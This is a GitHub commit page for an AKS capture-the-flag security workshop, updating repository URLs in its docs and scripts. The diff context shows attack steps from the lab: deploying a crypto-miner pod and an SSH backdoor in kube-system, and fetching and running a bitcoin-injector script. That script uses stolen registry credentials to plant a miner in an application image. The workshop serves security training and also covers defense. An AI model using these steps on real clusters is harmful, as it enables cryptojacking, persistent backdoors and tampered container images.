Merge pull request #11 from Azure/urlfix

updating URLs to new repo
Azure · Oct 24, 2024 · d5c346a · d5c346a
2 parents c87283d + 0f01836
commit d5c346a
Show file tree

Hide file tree

Showing 9 changed files with 15 additions and 15 deletions.
diff --git a/docs/azure.md b/docs/azure.md
@@ -4,7 +4,7 @@
 
 1.  Open a new tab to [Azure Cloud Shell](https://learn.microsoft.com/en-us/azure/cloud-shell/get-started/classic?tabs=azurecli).  You can [click here](https://shell.azure.com/).
 
-1. Clone the repo: `git clone https://github.com/lastcoolnameleft/aks-ctf.git && cd aks-ctf/workshop`
+1. Clone the repo: `git clone https://github.com/azure/aks-ctf.git && cd aks-ctf/workshop`
 
 1. Enable the AKS Resource Provider: `az provider register --namespace Microsoft.ContainerService`
 1. Once inside the Cloud Shell terminal, run setup.sh. This should create a new Project with a single-node Kubernetes cluster that contains the prerequisites for the workshop:

diff --git a/docs/scenario_1_attack.md b/docs/scenario_1_attack.md
@@ -158,13 +158,13 @@ kubectl auth can-i create pods
 
 It looks like we have hit the jackpot! Let's see if we can start mining some crypto.
 ```console
-kubectl apply -f https://raw.githubusercontent.com/lastcoolnameleft/aks-ctf/refs/heads/main/workshop/scenario_1/bitcoinero.yaml; sleep 10; kubectl get pods
+kubectl apply -f https://raw.githubusercontent.com/azure/aks-ctf/refs/heads/main/workshop/scenario_1/bitcoinero.yaml; sleep 10; kubectl get pods
 ```
 
 We can see the bitcoinero pod running, starting to generate a small but steady stream of cryptocurrency. But we need to take a few more steps to protect our access to this lucrative opportunity. Let's deploy an SSH server on the cluster to give us a backdoor in case we lose our current access later.
 
 ```console
-kubectl apply -n kube-system -f https://raw.githubusercontent.com/lastcoolnameleft/aks-ctf/refs/heads/main/workshop/scenario_1/backdoor.yaml
+kubectl apply -n kube-system -f https://raw.githubusercontent.com/azure/aks-ctf/refs/heads/main/workshop/scenario_1/backdoor.yaml
 ```
 
 Wait ~10 seconds for the Public IP to be exposed

diff --git a/docs/scenario_3_attack.md b/docs/scenario_3_attack.md
@@ -35,13 +35,13 @@ Some of the other red-team members have found this [neat trick from Twitter](htt
 
 Good luck!  They've come up with two scripts:
 
-* [run-bitcoin-injector.sh](https://github.com/lastcoolnameleft/aks-ctf/blob/main/workshop/bitcoin-injector/run-bitcoin-injector.sh) - deploy a [Kubernetes Job](https://kubernetes.io/docs/concepts/workloads/controllers/job/) that uses the registry credentials we found, to create another pod that injects our bitcoin miner into the container
-* [inject-image.sh](https://github.com/lastcoolnameleft/aks-ctf/blob/main/workshop/bitcoin-injector/inject-image.sh) - Uses Buildah to pulls the current app image, injects the bitcoin miner into the image, re-publishes the image under the same name
+* [run-bitcoin-injector.sh](https://github.com/azure/aks-ctf/blob/main/workshop/bitcoin-injector/run-bitcoin-injector.sh) - deploy a [Kubernetes Job](https://kubernetes.io/docs/concepts/workloads/controllers/job/) that uses the registry credentials we found, to create another pod that injects our bitcoin miner into the container
+* [inject-image.sh](https://github.com/azure/aks-ctf/blob/main/workshop/bitcoin-injector/inject-image.sh) - Uses Buildah to pulls the current app image, injects the bitcoin miner into the image, re-publishes the image under the same name
 
 Let's go back to our admin panel and run the following:
 
 ```console
-curl -O -J https://raw.githubusercontent.com/lastcoolnameleft/aks-ctf/refs/heads/main/workshop/bitcoin-injector/run-bitcoin-injector.sh; bash run-bitcoin-injector.sh
+curl -O -J https://raw.githubusercontent.com/azure/aks-ctf/refs/heads/main/workshop/bitcoin-injector/run-bitcoin-injector.sh; bash run-bitcoin-injector.sh
 ```
 
 Everything has been installed.  Let's kill our process and let the new image come up

diff --git a/docs/scenario_3_defense.md b/docs/scenario_3_defense.md
@@ -98,7 +98,7 @@ The binary drift detection feature alerts you when there's a difference between
 
 Our container was given a cluster role that was too permissive.
 
-https://github.com/lastcoolnameleft/aks-ctf/blob/main/workshop/manifests/omnibus.yml#L7-L14
+https://github.com/azure/aks-ctf/blob/main/workshop/manifests/omnibus.yml#L7-L14
 
 We got confirmation from the developer that the app needs to be able to see (but not modify) other pods in the namespace.  Let's update that role to be less permissive:
 

diff --git a/workshop/bitcoin-injector/inject-image.sh b/workshop/bitcoin-injector/inject-image.sh
@@ -41,7 +41,7 @@ echo $IMAGE_CMD
 apt-get update
 
 # Shhh...don't tell anyone, but our fake app is actually a stress test tool
-wget https://github.com/lastcoolnameleft/aks-ctf/raw/refs/heads/main/workshop/bitcoin-injector/moneymoneymoney -O /tmp/moneymoneymoney
+wget https://github.com/azure/aks-ctf/raw/refs/heads/main/workshop/bitcoin-injector/moneymoneymoney -O /tmp/moneymoneymoney
 chmod 755 /tmp/moneymoneymoney
 
 cat > /tmp/startup.sh << EOF

diff --git a/workshop/bitcoin-injector/run-bitcoin-injector.sh b/workshop/bitcoin-injector/run-bitcoin-injector.sh
@@ -39,7 +39,7 @@ spec:
         - --
         - bash
         - -c
-        - "rm -f inject-image.sh && curl -O -J https://raw.githubusercontent.com/lastcoolnameleft/aks-ctf/refs/heads/main/workshop/bitcoin-injector/inject-image.sh && bash inject-image.sh $IMAGE $REGISTRY_USERNAME $REGISTRY_PASSWORD"
+        - "rm -f inject-image.sh && curl -O -J https://raw.githubusercontent.com/azure/aks-ctf/refs/heads/main/workshop/bitcoin-injector/inject-image.sh && bash inject-image.sh $IMAGE $REGISTRY_USERNAME $REGISTRY_PASSWORD"
         imagePullPolicy: Always
         securityContext:
           privileged: true

diff --git a/workshop/insecure-app/README.md b/workshop/insecure-app/README.md
@@ -9,12 +9,12 @@ Run example:
 cd workshop/insecure-app
 
 # Build and push for Linux
-docker build --platform linux/amd64  -t lastcoolnameleft/insecure-app:latest .
-docker push lastcoolnameleft/insecure-app:latest
+docker build --platform linux/amd64  -t aks-ctf/insecure-app:latest .
+docker push aks-ctf/insecure-app:latest
 
 # Build and run for Mac (only for local testing)
-docker build --platform linux/arm64  -t lastcoolnameleft/insecure-app:latest .
-docker run -p 8080:8080 -e AUTH_USERNAME=foo -e AUTH_PASSWORD=bar lastcoolnameleft/insecure-app:latest
+docker build --platform linux/arm64  -t aks-ctf/insecure-app:latest .
+docker run -p 8080:8080 -e AUTH_USERNAME=foo -e AUTH_PASSWORD=bar aks-ctf/insecure-app:latest
 ```
 
 Once running, it will respond to the following paths:

diff --git a/workshop/manifests/omnibus.yml b/workshop/manifests/omnibus.yml
@@ -65,7 +65,7 @@ spec:
         - name: acr-secret  
       containers:
       - name: insecure-app
-        image: lastcoolnameleft/insecure-app:latest
+        image: aks-ctf/insecure-app:latest
         imagePullPolicy: Always
         ports:
         - containerPort: 8080

diff --git a/workshop/setup.sh b/workshop/setup.sh
@@ -161,7 +161,7 @@ kind: Kustomization
 resources:
 - omnibus.yml
 images:
-- name: lastcoolnameleft/insecure-app
+- name: aks-ctf/insecure-app
   newName: ${ACR_NAME}.azurecr.io/insecure-app
 EOF